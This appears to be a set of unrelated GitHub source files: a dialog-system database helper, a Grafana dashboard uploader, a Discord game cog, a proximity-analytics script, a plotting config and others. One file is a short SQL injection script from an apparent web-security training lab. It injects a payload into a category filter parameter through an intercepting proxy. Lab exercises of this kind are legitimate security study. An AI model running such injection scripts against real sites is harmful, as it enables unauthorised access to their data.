userWants[ENTITIES_KEY].append(ent)
else:
ents = getEntitesBySubject(
subjects)
userWants.setdefault(ENTITIES_KEY, ents)
return userWants if len(userWants) else None
def getPredicateInfoByEntityThroughDBs(dbs: tuple, ent: str, predicate: str) -> str:
for database in dbs:
for item in database:
if item[EntityIndex] is ent:
return item[AttrsDictIndex][predicate]
return None
def generateAllSPO(user_split_words,sys_answer_sentence=None):
SPO_list = []
contains_entities = []
if sys_answer_sentence:
for word in splitSentence(sys_answer_sentence):
if word in ENTITIES:
contains_entities.append(word)
for word in user_split_words:
if word in ENTITIES:
contains_entities.append(word)
for word in contains_entities:
database = ChooseDataBaseBySubjectName[ENTITIES_belongs_SUBJECTS[word]]
for item in database:
if item[EntityIndex] == word:
for predicate,object in item[AttrsDictIndex].items():
if isinstance(object,list):
for slice in object:
SPO_list.append([word,predicate,slice]) # tuple
elif object is not None:
SPO_list.append([word,predicate,object])
return SPO_list
def patternSubject(wordList):
for index , word in enumerate(wordList):
if word in SUBJECTS:
return word
return None
def patternPredicateWithSubject(wordList,subject):
for index, word in enumerate(wordList):
if word in subject:
return PREDICATES[subject]
return None
def patternEntity(wordList):
for index , word in enumerate(wordList):
if word in ENTITIES:
return word
return None
| LOST0LOSER/End-To-End-Dialog-System | utils/DataBase.py | DataBase.py | py | 9,837 | python | en | code | 0 | github-code | 36 |
28981509521 | import json
import traceback
from tendrl.commons.utils import log_utils as logger
from tendrl.monitoring_integration.grafana import constants
from tendrl.monitoring_integration.grafana import dashboard_utils
from tendrl.monitoring_integration.grafana import datasource
from tendrl.monitoring_integration.grafana import exceptions
from tendrl.monitoring_integration.grafana import grafana_org_utils
from tendrl.monitoring_integration.grafana import utils
def upload_default_dashboards():
dashboards = []
NS.config.data["credentials"] = utils.get_credentials()
try:
main_org_id = grafana_org_utils.get_org_id(constants.MAIN_ORG)
if main_org_id:
response = grafana_org_utils.switch_context(
json.loads(main_org_id)["id"]
)
except (exceptions.ConnectionFailedException, KeyError) as ex:
msg = (json.loads(main_org_id)).get(
"message", "Cannot connect to grafana")
logger.log("error", NS.get("publisher_id", None),
{'message': msg})
raise ex
title = []
# create datasource
datasource.create()
dashboards = dashboard_utils.get_all_dashboards()
for dashboard_json in dashboards:
title.append(dashboard_json["uri"].split('/')[1])
for dashboard_json in NS.config.data["dashboards"]:
if dashboard_json in title:
msg = '\n' + "Dashboard " + str(dashboard_json) + \
" already exists" + '\n'
logger.log("debug", NS.get("publisher_id", None),
{'message': msg})
continue
response = dashboard_utils.create_dashboard(dashboard_json)
if response.status_code == 200:
msg = '\n' + "Dashboard " + str(dashboard_json) + \
" uploaded successfully" + '\n'
logger.log("debug", NS.get("publisher_id", None),
{'message': msg})
else:
msg = ("Dashboard {0} upload failed. Error code: {1} ,"
"Error message: " + "{2} ").format(
str(dashboard_json),
str(response.status_code),
str(get_message_from_response(response)))
logger.log("debug", NS.get("publisher_id", None),
{'message': msg})
try:
dashboard_json = dashboard_utils.get_dashboard(
NS.config.data["home_dashboard"])
if 'dashboard' in dashboard_json:
dashboard_id = dashboard_json.get('dashboard').get('id')
response = dashboard_utils.set_home_dashboard(dashboard_id)
response = dashboard_utils.set_home_dashboard(dashboard_id)
if response.status_code == 200:
msg = '\n' + "Dashboard " + \
str(NS.config.data["home_dashboard"]) + \
" is set as home dashboard" + '\n'
logger.log("debug", NS.get("publisher_id", None),
{'message': msg})
else:
msg = '\n' + str(dashboard_json.get('message')) + '\n'
logger.log("debug", NS.get("publisher_id", None),
{'message': msg})
except exceptions.ConnectionFailedException as ex:
traceback.print_exc()
logger.log("error", NS.get("publisher_id", None),
{'message': str(ex)})
raise exceptions.ConnectionFailedException
def get_message_from_response(response_data):
message = ""
try:
if isinstance(json.loads(response_data.content), list):
message = str(json.loads(response_data.content)[0]["message"])
else:
message = str(json.loads(response_data.content)["message"])
except (AttributeError, KeyError):
pass
return message
| Tendrl/monitoring-integration | tendrl/monitoring_integration/grafana/dashboard.py | dashboard.py | py | 3,810 | python | en | code | 4 | github-code | 36 |
39489620609 | # dp
# boj-1495 기타리스트 문제와 유사. 각 항목에서 더하거나 빼거나
n = int(input())
numlist = [int(x) for x in input().split()]
eq_cnt = [[0] * 21 for _ in range(n + 1)]
eq_cnt[0][numlist[0]] = 1
for i in range(1, n-1):
for j in range(21):
if eq_cnt[i-1][j]:
if j - numlist[i] >= 0:
eq_cnt[i][j - numlist[i]] += eq_cnt[i-1][j]
if j + numlist[i] <= 20:
eq_cnt[i][j + numlist[i]] += eq_cnt[i-1][j]
ret = eq_cnt[n-2][numlist[-1]]
print(ret)
| bangalcat/Algorithms | algorithm-python/boj/boj-5557.py | boj-5557.py | py | 533 | python | ko | code | 1 | github-code | 36 |
25994684161 | import discord
from discord.ext import commands
import asyncio
import random
import datetime
import traceback
import os, sys
class Game(commands.Cog, name='一息ゲームコマンド'):
def __init__(self, bot):
self.bot = bot
@commands.command()
async def mine(self, ctx):
""" 14x14のマインスイーパを生成するぞ! """
bomb_list = []
num_dict = { 0 : '0⃣', 1 : '1⃣', 2 : '2⃣', 3 : '3⃣', 4 : '4⃣', 5 : '5⃣', 6 : '6⃣', 7 : '7⃣', 8 : '8⃣', 9 : '9⃣'}
search_list = ((-1, -1), (0, -1), (1, -1),
(-1, 0), (1, 0),
(-1, 1), (0, 1), (1, 1))
X = 14
Y = 14
# ボム生成
for y in range(Y):
bomb_list.append([9 if random.randint(0, 4) == 1 else 0 for i in range(X)])
# ボム位置の把握
for y in range(Y):
for x in range(X):
count = 0
if bomb_list[y][x] != 9:
for s_ptr in search_list:
tmp_x = x + s_ptr[0]
tmp_y = y + s_ptr[1]
if 0 <= tmp_x < X and 0 <= tmp_y < Y:
if bomb_list[tmp_y][tmp_x] == 9:
count += 1
bomb_list[y][x] = count
# 文字列に変換
mine_data = ''
for bomb_ptr in bomb_list:
#print(bomb_ptr)
for bomb in bomb_ptr:
if bomb == 9:
mine_data += '||#⃣||'
else:
mine_data += '||'+ num_dict[bomb] + '||'
mine_data += '\r\n'
mine_txt = await ctx.send(mine_data)
await mine_txt.add_reaction('😰')
# 答え合わせ
def check(reaction, user):
emoji = str(reaction.emoji)
if user.bot == True: # botは無視
pass
else:
return emoji == '😰'
while not self.bot.is_closed():
try:
reaction, user = await self.bot.wait_for('reaction_add', timeout=600, check=check)
except asyncio.TimeoutError:
await mine_txt.add_reaction('😪')
break
else:
if ctx.author.id != user.id:
continue
mine_data = ''
for bomb_ptr in bomb_list:
#print(bomb_ptr)
for bomb in bomb_ptr:
if bomb == 9:
mine_data += '||#⃣||'
else:
mine_data += num_dict[bomb]
mine_data += '\r\n'
await mine_txt.edit(content=mine_data)
await mine_txt.add_reaction('😪')
break
@commands.command()
async def slot(self, ctx):
"""スロットを回すぞ!"""
def make_slot_txt(s):
txt = '**'
for i in range(0, 3):
txt += '['+ s[i][0] +'] ['+ s[i][1] +'] ['+ s[i][2] +']\r\n'
return txt + '**'
def set_slot(s, item, x):
r = random.randint(0, 8)
for i in range(0, 3):
s[i][x] = item[r]
r += 1
if r > 8: r = 0
return s
s = [['㊙️', '㊙️', '㊙️'], ['㊙️', '㊙️', '㊙️'], ['㊙️', '㊙️', '㊙️']]
item = ['7⃣', '🔔', '🍉', '🍌', '🍋', '🍊', '🍒', '🍇', '🎰']
num = { '0⃣' : 0, '1⃣' : 1, '2⃣' : 2 }
slot_txt = await ctx.send(make_slot_txt(s))
await slot_txt.add_reaction('0⃣')
await slot_txt.add_reaction('1⃣')
await slot_txt.add_reaction('2⃣')
def check(reaction, user):
emoji = str(reaction.emoji)
if user.bot == True: # botは無視
pass
else:
return emoji == '0⃣' or emoji == '1⃣' or emoji == '2⃣' or emoji == '🔄'
cnt = 0
index_list = []
while not self.bot.is_closed():
try:
reaction, user = await self.bot.wait_for('reaction_add', timeout=60, check=check)
except asyncio.TimeoutError:
await slot_txt.add_reaction('😪')
break
else:
if ctx.author.id != user.id:
continue
if str(reaction.emoji) == '🔄':
index_list = list()
cnt = 0
s = [['㊙️', '㊙️', '㊙️'], ['㊙️', '㊙️', '㊙️'], ['㊙️', '㊙️', '㊙️']]
await slot_txt.edit(content=make_slot_txt(s))
continue
cnt += 1
index = num[str(reaction.emoji)]
if index not in index_list:
index_list.append(index)
s = set_slot(s, item, index)
await slot_txt.edit(content=make_slot_txt(s))
if cnt >= 3:
await slot_txt.add_reaction('🔄')
def setup(bot):
bot.add_cog(Game(bot)) | hirosuke-pi/DiscordBot | progracat/mods/game/main.py | main.py | py | 5,289 | python | en | code | 0 | github-code | 36 |
10513629088 | #import getopt
import sys
#import ast
import json
import formatingDataSetProximity as formating
import enumerateTrackersProximity as et
import distancesProximity as distances
import visualisationProximity as vis
from datetime import datetime
from time import gmtime, strftime
import pandas as pd
def main():
# intimate, personal, social, public
#personal validate distances (0.46-1.2m)
proxemic='intimate'
proxemic2='intimate'
patientIDDevice=''
#folderData='/Users/13371327/Documents/Gloria/2020/RulesApp/obs-rules/server/routes/localisation/data';
folderData = 'server/routes/localisation/data'
#print(folderData);
roles = {}
coordinates={}
centeredRole=''
A= json.loads(str(sys.argv[1]))
B= json.loads(str(sys.argv[2]))
C= json.loads(str(sys.argv[3]))
# GETTING PARAMETERS FROM NODE
#ID rule
idRule = A[0]['id']
#TYPE OF GRAPH
typeOfGraph = A[0]['value_of_mag']
spetialSim=''
if typeOfGraph == 'Priority':
spetialSim='barchar'
if typeOfGraph == 'All':
typeOfGraph='full'
else:
typeOfGraph='role-centered'
#PHASES
myFormat = '%Y-%m-%d %I:%M:%S'
phase1 = B[0]['time_action']
phase2 = B[1]['time_action']
#print('dates in the python script: ', phase1, phase2)
#phase1 = datetime.strptime(phase1.split('.')[0], myFormat)
#phase2 = datetime.strptime(phase2.split('.')[0], myFormat)
#print('dates in the python script AFTER : ', phase1, phase2)
#CENTERED ROLE
if typeOfGraph == 'role-centered':
#print('The value of the center role: ', A[0]['value_of_mag'])
if(A[0]['value_of_mag'] is None or A[0]['value_of_mag']== '' or A[0]['value_of_mag']== 'null'):
centeredRole='11111'
else:
centeredRole= A[0]['value_of_mag']
else:
centeredRole=0
# ROLES
#print('centeredRole value: ', centeredRole)
#7 is the patient role according to the web tool
for x in range(len(C)):
if (C[x]['id_object']) == 7:
patientIDDevice = C[x]['serial']
patientcoordinates = C[x]['coordinates']
if(centeredRole=='11111'):
roles[x] = C[x]['name'] + ',' + '11111'
else:
roles[x] = C[x]['name'] + ',' + '11111'
#print('Here is the patient information: ',patientIDDevice, patientcoordinates, roles[x])
else:
roles[x] = C[x]['name'] + ',' + C[x]['serial']
#print(roles[x])
#print('After the loop: ',patientIDDevice)
# WHICH SESSION
session = A[0]['id_session']
file = folderData + '/' + str(session) + '.json'
#print(A, B, str(sys.argv[3]));
#print(typeOfGraph, phase1, phase2, centeredRole, len(C), roles, session);
# Reminder: to know who the patient is, use the roles dictionary
#print(typeOfGraph, phase1, phase2, centeredRole, len(C), roles, session);
if(spetialSim=='barchar'):
#print('Here we are about to generate a barchar')
D = json.loads(str(sys.argv[4]))
#COORDINATES
for x in range(len(D)):
coordinates[x] = D[x]['coordinates']
#print('This is the first group of coordinates: ', D[0]["coordinates"], D[0]["name"])
createBarChar(file, session, coordinates,proxemic, phase1, phase2, idRule, patientIDDevice)
else:
initAnalisis(file, centeredRole, proxemic, proxemic2, phase1, phase2, roles, typeOfGraph, session, idRule, patientIDDevice, patientcoordinates)
def initAnalisis(file, centeredRole, proxemic,proxemic2, phase1, phase2, roles, typeOfGraph, session, idRule, patientIDDevice, patientcoordinates):
#READ DATA
df = formating.readingDataJson(file,session)
#print('Alll the variables I want to know: ',centeredRole, patientcoordinates, patientIDDevice);
if ((not(patientIDDevice is None)) & (patientIDDevice != '')) & (typeOfGraph=='full'):
query = 'tracker !=' + patientIDDevice
df = df.query(query)
if (typeOfGraph=='role-centered'):
# Add the patient info into the dataFrame
if(not(patientcoordinates is None)) & (centeredRole=='11111'):
#create a small dataFrame with the patient info
#the tagId is 0000
#print('Good the patient coordinate and the centered role is patient', centeredRole, patientcoordinates)
start = df['timestamp'].iloc[0]
# last value
end = df['timestamp'].iloc[-1]
dfPatient= formating.creatingTimestampColumns(start, end, patientcoordinates, session)
#Concat the new dataFrame with the one that was read in the first line
frames = [dfPatient, df]
df = pd.concat(frames, sort=True)
df = df.reset_index()
#print(df);
elif (patientcoordinates is None):
response = {"message": 'none', "path": 'none', "messageError": 'Please set the patient coordinate or the role serial tracker'}
json_RESPONSE = json.dumps(response)
print(json_RESPONSE)
#FORMATING
#session = session;
#FILTER DATA ACCORDING TO PHASES
df1= formating.nameTrackers(df, roles)
#print(df.loc[df['tracker'] == 26689])
#print(df1.Role.unique())
#print(df1)
#GET NUMBER OF TRACKERS
n = et.numberTrackers(df1)
#print ('number of trackers', n)
#print (roles)
#print ('BEFORE FILTERING: ',len(df.index))
#FILTERING PER PHASE
#df = formating.asign_phases(df, phase1, phase2)
df, toSend = formating.filteringPhases(df1, phase1, phase2)
#Total of seconds
#print('This is the data number of rows: ',len(df.index))
totalSeconds = len(df.index)
if df.empty:
#print('No matching rows: ', toSend);
df, toSend= formating.filteringPhasesAdding(df1, phase1, phase2)
if df.empty:
df, toSend = formating.filteringPhasesMinosTimeZone(df1, phase1, phase2)
if df.empty:
df, toSend = formating.filteringPhasesMinosTimeZone1(df1, phase1, phase2)
#print(toSend)
#print(df, toSend)
#print('This is the data filtered dataframe: ',df.Role.unique(), df)
# Call the function that enumerates trackers
df_trackers = et.enumerate_trackers(df)
#print('df_trackers: $$$$$',df_trackers)
df = et.asignEnumTrackers(df, df_trackers)
#print('Assign enum trackers: $$$$$',df)
# HERE I NEED TO KNOW HOW MANY SECONDS THIS SECTION OF THE SIMULATION LAST
#print ('AFTER FILTERING: ',len(df.index))
# WHICH TRACKER IS THE SELECTED ROLE, returns the enum tracker
#print('Here is the center role value: ',centeredRole)
centeredRole = formating.roleNum(df, df_trackers, centeredRole)
#print('Enum for the selected role in the miedle: $$$$$', centeredRole)
## DISTANCES
# To run the calculation of distances it requires the number of trackers and the dataset
df_distancesBetTrackers = distances.distancesBetweenTrackers(df, n)
#print('Distances between trackers: $$$$$', df_distancesBetTrackers)
#print(df_distancesBetTrackers.head(10))
# The next steep is to asign proxemic labels according to the distances
df_proxemic_labels, prox_labels = distances.proxemicsLabels(df_distancesBetTrackers, n)
#print('Labels according to the distance: $$$$$', df_proxemic_labels, prox_labels)
#print(df_proxemic_labels, prox_labels)
# Agregate the proxemic labels per session
df = vis.aggregateLabels(df_proxemic_labels, prox_labels)
#print('Agregation of the proxemic labels', df.head(5))
if (typeOfGraph == 'full'):
#print(df.head(10))
filterProxemic = vis.filterPL(df, proxemic, proxemic2, role=0)
# trackers_names = vis.nameTrackers(df, listRoles)
#df_trackers_ordered = vis.orderTrackers(centeredRole, df_trackers)
trackers_names = vis.nameTrackers(df_trackers, roles)
#trackers_names = vis.nameTrackers(df_trackers, roles)
#filterProxemic = vis.filterPL(df, proxemic,proxemic2, role=0)
graph, message = vis.generateFullGraph(filterProxemic, trackers_names)
name = vis.visualiseGraph1(graph, session, 'porcentages', proxemic, idRule)
response = {"message": message, "path": name, "messageError": "none"}
json_RESPONSE = json.dumps(response)
print(json_RESPONSE)
# Indicators of centrality
#print('GRAPH DEGREE: ', vis.graphDegree(graph))
#print('VERTEX 1 DEGREE: ', vis.vertexDegree(1, graph))
#print('EDGE DEGREE: ', vis.edgeBetweennes(graph))
#print('VERTEX DEGREE: ', vis.vertexBetweennes(graph))
#print('LARGEST BETWEENESS: ', vis.largestBetweeness(graph, 'tracker'))
#print('PAGE RANK: ', vis.pageRabk(graph))
#print('PERSONALISE PAGE RANK: ', vis.PpageRabk(graph, 'proxLabel'))
else:
# Filtering data according to proxemic label of interest and the role
filterProxemic = vis.filterPL(df, proxemic, proxemic2, centeredRole)
#totalSeconds = len(filterProxemic.index)
#print('Filter the data according to the proxemic label: ',filterProxemic)
# Once we have the proxemic labels we can try to plot the SN
df_trackers_ordered = vis.orderTrackers(centeredRole, df_trackers)
#print(df_trackers_ordered)
trackers_names = vis.nameTrackers(df_trackers_ordered, roles)
#print('NAME TRACKERS: @@@@ ',trackers_names)
#print('ORDERED TRACKERS: @@@@ ', df_trackers_ordered)
# VISUALISE
# visualise normalized data and porcentages
dfnorm = vis.normalizedata(filterProxemic)
#print(dfnorm)
graph, message = vis.graphDefinition(dfnorm, trackers_names, 'porcentages')
#print(graph)
name = vis.visualiseGraph1(graph, session, 'porcentages', proxemic, idRule)
response = {"message":message, "path":name, "messageError": "none"}
json_RESPONSE = json.dumps(response)
print(json_RESPONSE)
def createBarChar(file, session, coordinates,proxemic, phase1, phase2, idRule, patientIDDevice):
#Read the file
df1 = formating.readingDataJson(file, session)
#Remove the patient' data from the dataFrame, if it was tracked
#print('Patient ID device', patientIDDevice)
#print(df1.head(10), df1.tracker.unique(), phase1, phase2)
if (patientIDDevice!='') & (not(patientIDDevice is None)):
query='tracker !=' + patientIDDevice
df1 = df1.query(query)
#FilterDataSet
df, toSend = formating.filteringPhases(df1, phase1, phase2)
if df.empty:
# print('No matching rows: ', toSend);
df, toSend = formating.filteringPhasesAdding(df1, phase1, phase2)
if df.empty:
df, toSend = formating.filteringPhasesMinosTimeZone(df1, phase1, phase2)
if df.empty:
df, toSend = formating.filteringPhasesMinosTimeZone1(df1, phase1, phase2)
#print(toSend)
#print(df.tracker.unique(), toSend, df)
#print('This is the data number of rows: ',len(df.index))
#Calculate distancesRolesAndBeds
df = distances.calculateDistancesRolesToBeds(df, coordinates)
#Were they in intimate proxemity with the patient asign label?
numberOfPatients = len(coordinates)
#print('The number of patients is: ', numberOfPatients);
# careful with this functions of do you want to validate different distances. works only for intimate and personal
df = distances.asignProximityLabel(df, numberOfPatients)
#Agregate values according to the proximity of each patient Create a summary
# bed 1: %, bed 2: %, bed 3: %
itemsPlot, message, indexMax=distances.aggregateProximity(df, proxemic, numberOfPatients)
name = vis.plotBarChart(itemsPlot, session, idRule, indexMax)
response = {"message": message, "path": name, "messageError": "none"}
json_RESPONSE = json.dumps(response)
print(json_RESPONSE)
if __name__ == "__main__":
# execute only if run as a script
main()
| Teamwork-Analytics/obs-rules | server/routes/localisation/ProximityLocalisation.py | ProximityLocalisation.py | py | 10,895 | python | en | code | 1 | github-code | 36 |
32676816163 | import requests
import sys
import urllib3
from requests_toolbelt.utils import dump
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
def exploit_sqli(url, payload):
path = 'filter?category='
r = requests.get(url + path + payload, verify=False, proxies=proxies)
data = dump.dump_all(r)
print(data.decode('utf-8'))
if ".svg" in r.text:
return True
else:
return False
if __name__ == "__main__":
try:
url = sys.argv[1].strip()
payload = sys.argv[2].strip()
except IndexError:
print("[-] Usage: %s <url> <payload>" % sys.argv[0])
print('[-] Example: %s www.example.com "1=1"' % sys.argv[0])
sys.exit(-1)
if exploit_sqli(url, payload):
print("[+] SQL injection successful!")
else:
print("[-] SQL injection unsuccessful!")
| marcomania/Web-Security-Academy-Series | sql-injection/lab-01/sqli-lab-01.py | sqli-lab-01.py | py | 934 | python | en | code | 0 | github-code | 36 |
73743833704 | import re
import logging
import ROOT
import plottingConfig as cfg
class Config(cfg.PlottingConfig):
def __init__ (self, options):
self.options = options
super(Config, self).__init__()
sigma = 1 # at mu=1 (arbitrary for AZh)
sigma_units = 'fb'
# self.force_mu = (True, 0.16) # 700 GeV
self.force_mu = (True, 10) # 600 GeV
# for child classes to use
# self.loggingLvl = logging.INFO
self.loggingLvl = logging.DEBUG
self.verbose = False
self.formats = [ 'eps', 'pdf', 'png', 'root', 'C' ]
self.blind = True
self.thresh_drop_legend = 0.01
self.restrict_to = []
self.excludes = []
self.additionalPlots = []
self.add_sig_to_ratio_plot = True
self.use_exp_sig = True
# self.transferResults_fitName = "HiggsNorm"
# self.get_binning_hist_removal = ["_meas2l2q2v2q"]
self.bkg_substr_name = "Diboson"
self.bkg_substr_list = ["diboson", "Diboson", "WZ", "ZZ", "VZ"]
self.file_tags = ["Y", "L", "J", "T", "TType", "Flv", "Sgn", "isMVA", "dist", "Spc", "D", "nAddTag", "BMax", "BMin", "Fat", "incFat", "incJet", "incAddTag"]
self.weight_tags = ["Higgsweighted", "Dibosonweighted"]
self.sig_names = ["VH"]
self.signal = ["A#rightarrow Zh (best fit)", self._STACK, ROOT.kRed + 1, 1] # last = mult factor
self.expected_signal = ["VHbb", self._STACK, ROOT.kRed +1, self.force_mu[1]] # last = expected mu
#self.expected_signal = ["A#rightarrow Zh (#sigma={0} {1})".format(int(sigma*self.force_mu[1]), sigma_units), self._STACK, ROOT.kRed +1, self.force_mu[1]] # last = expected mu
# self.additional_signal = ["A#rightarrow Zh", self._OVERPRINT, ROOT.kRed +1, 1.]
self.bkg_tuple = {'ttbar': ("t#bar{t}", 42, ROOT.kOrange, []),
'stopt': ("t, s+t chan", 41, ROOT.kOrange - 1, ["stops"]),
'stops': ("t, s+t chan", 41, ROOT.kOrange - 1, ["stopt"]),
'stopWt': ("Wt", 40, ROOT.kYellow - 7, []),
'stop': ("Single top", 40, ROOT.kOrange - 1, []),
'Zbb': ("Z+bb", 25, ROOT.kAzure + 3, []),
'Zbc': ("Z+bc", 24, ROOT.kAzure + 2, []),
'Zclbl': ("Z+(bl,cl)", 23, ROOT.kAzure + 1, []),
'Zbl': ("Z+bl", 23, ROOT.kAzure + 1, []),
'Zcl': ("Z+cl", 21, ROOT.kAzure - 8, []),
'Zcc': ("Z+cc", 22, ROOT.kAzure - 4, []),
'Zhf': ("Z+(bb,bc,cc)", 22, ROOT.kAzure + 2, []),
'Zl': ("Z+l", 20, ROOT.kAzure - 9, []),
'Wbl': ("W+bl", 33, ROOT.kGreen + 2, []),
'Wbb': ("W+bb", 35, ROOT.kGreen + 4, []),
'Wbc': ("W+bc", 34, ROOT.kGreen + 3, []),
'Wcc': ("W+cc", 32, ROOT.kGreen + 1, []),
'Whf': ("W+(bb,bc,cc,bl)", 32, ROOT.kGreen + 3, []),
'Wcl': ("W+cl", 31, ROOT.kGreen - 6, []),
'Wl': ("W+l", 30, ROOT.kGreen - 9, []),
'WZ': ("WZ", 53, ROOT.kGray + 1, ["ZZ"]),
'ZZ': ("ZZ", 52, ROOT.kGray + 1, ["WZ"]),
'VZ': ("VZ", 51, ROOT.kGray + 1, []),
'diboson': ("Diboson", 51, ROOT.kGray + 1, []),
'WW': ("WW", 50, ROOT.kGray + 3, []),
'Diboson': ("Diboson", 50, ROOT.kGray + 1, []),
#'VH125': ("Vh", 49, ROOT.kRed - 6, []),
'multijet': ("Multijet", 39, ROOT.kViolet-9, ["multijetMu", "multijetEl"]),
'multijetEl': ("Multijet", 39, ROOT.kViolet-9, ["multijetMu", "multijet"]),
'multijetMu': ("Multijet", 39, ROOT.kViolet-9, ["multijetEl", "multijet"])}
# self.ATLAS_suffix = "Internal"
# self.ATLAS_suffix = "Simulation"
self.ATLAS_suffix = "Preliminary"
# self.ATLAS_suffix = ""
# for yields
self.make_slides = False
self.window = None
self.priorities = {
"data" : 80,
"S/sqrt(S+B)" : 73,
"S/B" : 72,
"Bkg" : 60,
"MC" : 75,
"SignalExpected" : 71,
"Signal" : 70,
"VH125" : 57,
"ZvvH125" : 67,
"ggZvvH125" : 67,
"qqZvvH125" : 67,
"WlvH125" : 68,
"ZllH125" : 69,
"ggZllH125" : 69,
"qqZllH125" : 69,
"ZvvH150" : 67,
"ggZvvH150" : 67,
"qqZvvH150" : 67,
"WlvH150" : 68,
"ZllH150" : 69,
"AZhllbb1200" : 70,
"AZhvvbb1200" : 70,
"AZhllbb1000" : 70,
"AZhvvbb1000" : 70,
"AZhllbb400" : 70,
"AZhvvbb400" : 70,
"AZhllbb300" : 70,
"AZhvvbb300" : 70,
"AZhllbb600" : 70,
"AZhvvbb600" : 70,
"bbAZhllbb600" : 70,
"bbAZhvvbb600" : 70,
"ggZllH150" : 69,
"qqZllH150" : 69,
"ttbar" : 45,
"stops" : 43,
"stopt" : 42,
"stopst" : 41,
"stopWt" : 40,
"stop" : 40,
"Zhf" : 27,
"Zb" : 24,
"Zbl" : 25,
"Zbb" : 27,
"Zbc" : 26,
"Zc" : 21,
"Zcl" : 100,
"Zclbl" : 22,
"Zcc" : 23,
"Zl" : 20,
"Whf" : 37,
"Wb" : 34,
"Wbl" : 35,
"Wbb" : 37,
"Wbc" : 36,
"Wcc" : 33,
"Wc" : 31,
"Wcl" : 32,
"Wl" : 30,
"WZ" : 53,
"ZZ" : 52,
"VZ" : 51,
"WW" : 50,
"Diboson" : 50,
"diboson" : 50,
"multijet" : 45,
"multijetEl" : 45,
"multijetMu" : 45,
"MJ0lep" : 45,
"MJ1lep" : 45,
"MJ2lep" : 45,
"MJ2lepEl" : 45,
"MJ1lepEl" : 45,
"MJ1lepMu" : 45,
}
# for reduced diag plots only
self.exclude_str = 'HiggsNorm'
self.cov_classification = {
"BTag": [False, ["SysFT_EFF_Eigen", "SysFT_EFF_extrapolation"], []],
"Top": [False, ["SysWt", "SysTop", "SysTtbar", "SysMVH"], []],
"ModelBoson": [False, ["SysVV", "SysWM","SysZM","SysWD","SysZD","SysWP","SysZP","SysVj"], []],
"Norm": [False, ["Norm","Ratio"], []],
"norm": [False, ["norm"], []],
"Lepton": [False, ["SysMUON","SysEL","SysEG"], []],
"Jet": [False, ["SysJET","FATJET"], []],
"MET": [False, ["SysMET"], []],
"LUMI": [False, ["LUMI"], []],
"Shifted": [True, [], ["blablabla"]]
}
self.cov_special = {
"noMCStat": [[], ["gamma"]],
"JES": [["SigX", "norm_", "Jet"], []],
"BTag": [["SigX", "norm_", "BTag"], []],
"Mbb": [["SigX", "norm_", "Mbb"], []],
"Modelling": [["SigX", "norm_", "Norm", "Ratio", "PtBi"], []],
"SF": [["SigX", "norm_"], []],
"Norm": [["3JNorm", "norm_", "Norm", "Ratio"], []]
}
self.syst_to_study = ["JetEResol", "Mbb_Whf", "V_Whf", "METScale", "TChanP",
"ttbarHigh", "BJetReso", "ZblZbb", "BTagB1", "norm_Wbb", "WblWbbRatio"]
self.suspicious_syst = ["norm_"]
# for yield ratios only
self.category_condenser = {
# "_HistSyst": ["_Exp", False],
# "_dist(mva|mjj)": ["_dist", False],
# "_distMV1cBTag": ["_dist", False],
"_distmV": ["_dist", False],
# "_isMVA[01]": ["_isMVA", False],
# "_B[0-5]_": ["_B9_", False],
"_B(Max500_BMin0|BMin500)_": ["_Bresolvedmerged_", False],
# "_TType(ll|mm|tt|xx)": ["_TType", False],
"_T[012]": ["_Tx", False],
"_(incJet1_J|incFat1_Fat|J)[1235]": ["_Jx", False],
# "_Spc[0-9a-z]*top[a-z]*cr": ["_TType", False],
# "(multijet)(.*_L)([0123])(.*)": [r'MJ\3lep\2\3\4', False],
"_L[012]": ["_Lx", False],
"_D(SR|topemucr)": ["_DallRegions", False],
# "_W(bb|bl|bc|cc)_": ["_Whf_", True],
# "_Z(bb|bl|bc|cc)_": ["_Zhf_", True]
}
logging.basicConfig(format='%(levelname)s in %(module)s: %(message)s', level=self.loggingLvl)
def do_rebinning (self, prop):
# NOTE: JWH - ED board requests
if prop["dist"] == "mVH":
if "mBBcr" in prop["D"] or "topemucr" in prop["D"]:
if prop["L"] == "2" or prop["L"] == "0":
if prop.get("incFat", "-1") == "1" or prop.get("incJet", "-1") == "1":
return False
if "SR" in prop["D"]:
if prop["L"] == "2" or prop["L"] == "0":
if prop.get("incFat", "-1") == "1":
return False
if prop["L"] == "0":
return False
return True
def is_signal(self, compname):
""" Check if a component is Higgs. If yes, return mass """
# Spyros: Add ggA to list of signal names - has to be first in list otherwise we get problems
signames = self.sig_names
has_mass = False
mass = ""
# Spyros: if sg in compname matches also mVH so doesn't work for resonance analyses
# remove mVH from compname
compname = re.sub('mVH', '', compname)
for sg in signames:
if sg in compname:
has_mass = True
pos = compname.find(sg) + len(sg)
mass = int(re.sub("[^0-9]", "", compname[pos:pos + compname[pos:].find('_')]))
break
return has_mass, mass
def blind_data (self, setup):
def _do_blinding (title):
#return False, []
return "T2" in title, [110, 140]
do_blinding, blind_range = _do_blinding(setup.title)
if do_blinding:
# blind entire range
if blind_range[0] == 0 and blind_range[1] == 0:
blind_range[0] = setup.data.h.GetXaxis().GetXmin()
blind_range[1] = setup.data.h.GetXaxis().GetXmax()
setup.data.blind(blind_range[0], blind_range[1])
#else:
# # Add general blinding at 2% S/B
# for i in range(1, setup.hsum.GetNbinsX()+1):
# if setup.hsum.GetBinContent(i) > 0:
# sob = setup.exp_sig.h.GetBinContent(i) / ( setup.hsum.GetBinContent(i) )
# if sob > 0.02:
# setup.data.blind(setup.hsum.GetBinLowEdge(i), setup.hsum.GetBinLowEdge(i+1))
# elif setup.exp_sig.h.GetBinContent(i) > 0:
# setup.data.blind(setup.hsum.GetBinLowEdge(i), setup.hsum.GetBinLowEdge(i+1))
def preprocess_main_content_histogram (self, hist, setupMaker):
return hist
# def change_MeV_GeV(hist):
# if isinstance(hist, ROOT.TH1):
# new_hist = hist.Clone()
# bins = new_hist.GetXaxis().GetXbins()
# for i in range(bins.GetSize()):
# bins[i] /= 1000.
# new_hist.SetBins(bins.GetSize()-1, bins.GetArray())
# for i in range(new_hist.GetNbinsX()+2):
# new_hist.SetBinContent(i, hist.GetBinContent(i))
# new_hist.SetBinError(i, hist.GetBinError(i))
# elif isinstance(hist, ROOT.TGraph):
# new_hist = hist
# xbins = new_hist.GetX()
# for i in range(new_hist.GetN()):
# xbins[i] /= 1000.
# if isinstance(hist, ROOT.TGraphAsymmErrors):
# xbinsup = new_hist.GetEXhigh()
# xbinsdo = new_hist.GetEXlow()
